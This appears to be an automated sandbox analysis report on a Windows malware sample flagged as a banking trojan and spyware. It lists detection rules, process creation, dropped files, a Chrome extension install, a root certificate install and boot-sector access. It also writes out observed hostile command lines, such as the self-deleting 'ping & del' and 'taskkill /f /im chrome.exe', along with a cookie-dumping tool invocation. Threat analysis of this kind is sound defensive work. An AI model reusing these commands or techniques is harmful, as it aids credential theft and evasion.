Source: 0.2.fnhcdXEfus.exe.2810000.5.raw.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.63C4F3D9EA0CC861.exe.3280000.6.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 3.2.63C4F3D9EA0CC861.exe.3380000.5.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: classification engineClassification label: mal90.bank.troj.spyw.evad.winEXE@32/37@4/2
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_0045895B GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_0043FFF7 lstrcpyW,GetDiskFreeSpaceExW,
Source: C:\Users\user\AppData\Roaming\1612045890161.exeCode function: 11_2_0040CE93 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00431AAB CoCreateInstance,
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00418579 FindResourceW,SizeofResource,LoadResource,LockResource,
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Login Data1612045889505Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6336:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1968:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5752:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3924:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello002
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello001
Source: C:\Users\user\Desktop\fnhcdXEfus.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign__install_r3
Source: C:\Users\user\Desktop\fnhcdXEfus.exeFile created: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeJump to behavior
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: runfromtemp
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: HsG
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: eprq
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: HsG
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: HsG
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: debuglog
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: Setup.cpp
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: reboot
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: Setup.cpp
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: HsG
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: Setup.cpp
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: %s%s
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: HsG
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: tempdisk1folder
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: HsG
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: ISSetup.dll
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: ISSetup.dll
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: HsG
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: Skin
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: Startup
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: setup.isn
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: HsG
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: Supported
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: Languages
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: %s\%s.ini
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: %s\%s.ini
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: %s\%.04ld.mst
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: %s\%.04ld.mst
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: HsG
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: HsG
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: HsG
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: HsG
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: HsG
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: StartUp
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: Setup.cpp
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: clone_wait
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: HsG
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: HsG
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCommand line argument: Setup.cpp
Source: fnhcdXEfus.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Roaming\1612045890161.exeSystem information queried: HandleInformation
Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;chrome.exe&quot;)
Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\win.iniJump to behavior
Source: C:\Users\user\Desktop\fnhcdXEfus.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\fnhcdXEfus.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\fnhcdXEfus.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: fnhcdXEfus.exeVirustotal: Detection: 73%
Source: fnhcdXEfus.exeMetadefender: Detection: 29%
Source: fnhcdXEfus.exeReversingLabs: Detection: 82%
Source: C:\Users\user\Desktop\fnhcdXEfus.exeFile read: C:\Users\user\Desktop\fnhcdXEfus.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\fnhcdXEfus.exe 'C:\Users\user\Desktop\fnhcdXEfus.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 72A2D95648135F8DB654A3D18B753FD0 C
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 0011 installp2
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 200 installp2
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\fnhcdXEfus.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Users\user\AppData\Roaming\1612045890161.exe 'C:\Users\user\AppData\Roaming\1612045890161.exe' /sjson 'C:\Users\user\AppData\Roaming\1612045890161.txt'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\fnhcdXEfus.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: C:\Users\user\Desktop\fnhcdXEfus.exeProcess created: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 0011 installp2
Source: C:\Users\user\Desktop\fnhcdXEfus.exeProcess created: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 200 installp2
Source: C:\Users\user\Desktop\fnhcdXEfus.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\fnhcdXEfus.exe'
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeProcess created: C:\Users\user\AppData\Roaming\1612045890161.exe 'C:\Users\user\AppData\Roaming\1612045890161.exe' /sjson 'C:\Users\user\AppData\Roaming\1612045890161.txt'
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeProcess created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe'
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Install
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: fnhcdXEfus.exeStatic file information: File size 4453376 > 1048576
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Source: fnhcdXEfus.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: fnhcdXEfus.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: fnhcdXEfus.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: fnhcdXEfus.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: fnhcdXEfus.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: fnhcdXEfus.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: fnhcdXEfus.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: fnhcdXEfus.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.3.dr
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1612045890161.exe, 0000000B.00000000.258604279.000000000040F000.00000002.00020000.sdmp, 1612045890161.exe.3.dr
Source: Binary string: atl71.pdbT source: atl71.dll.3.dr
Source: Binary string: msvcr71.pdb\ source: msvcr71.dll.3.dr
Source: Binary string: atl71.pdb source: atl71.dll.3.dr
Source: Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_engine.dll.3.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.3.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.3.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.3.dr
Source: Binary string: msvcp71.pdb source: msvcp71.dll.3.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.3.dr
Source: Binary string: C:\CodeBases\isdev\redist\Language Independent\i386\setup.pdb source: fnhcdXEfus.exe
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 0000001E.00000002.347950817.00000000002BC000.00000002.00020000.sdmp, ThunderFW.exe.3.dr
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.3.dr
Source: Binary string: msvcr71.pdb source: msvcr71.dll.3.dr
Source: Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: MSI6DDB.tmp.1.dr
Source: fnhcdXEfus.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: fnhcdXEfus.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: fnhcdXEfus.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: fnhcdXEfus.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: fnhcdXEfus.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

barindex
Detected unpacking (creates a PE file in dynamic memory)Show sources
Source: C:\Users\user\Desktop\fnhcdXEfus.exeUnpacked PE file: 0.2.fnhcdXEfus.exe.2810000.5.unpack
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00440314 __EH_prolog3_GS,LoadLibraryW,GetProcAddress,#17,
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_004427DD push ecx; ret
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10010579 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_10010579 push ecx; ret
Source: C:\Users\user\AppData\Roaming\1612045890161.exeCode function: 11_2_0040E2F1 push ecx; ret
Source: C:\Users\user\AppData\Roaming\1612045890161.exeCode function: 11_2_0040E340 push eax; ret
Source: C:\Users\user\AppData\Roaming\1612045890161.exeCode function: 11_2_0040E340 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 30_2_002B3FB5 push ecx; ret

Persistence and Installation Behavior:

barindex
Contains functionality to infect the boot sectorShow sources
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Installs new ROOT certificatesShow sources
Source: C:\Users\user\Desktop\fnhcdXEfus.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD BlobJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Temp\download\download_engine.dllJump to dropped file
Source: C:\Users\user\Desktop\fnhcdXEfus.exeFile created: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI6DDB.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Temp\download\msvcp71.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Roaming\1612045890161.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Temp\download\msvcr71.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Temp\download\zlib1.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Temp\download\atl71.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Temp\xldl.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmceJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\icon.pngJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\icon48.pngJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\popup.htmlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\background.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\book.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\jquery-1.8.3.min.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\popup.jsJump to behavior
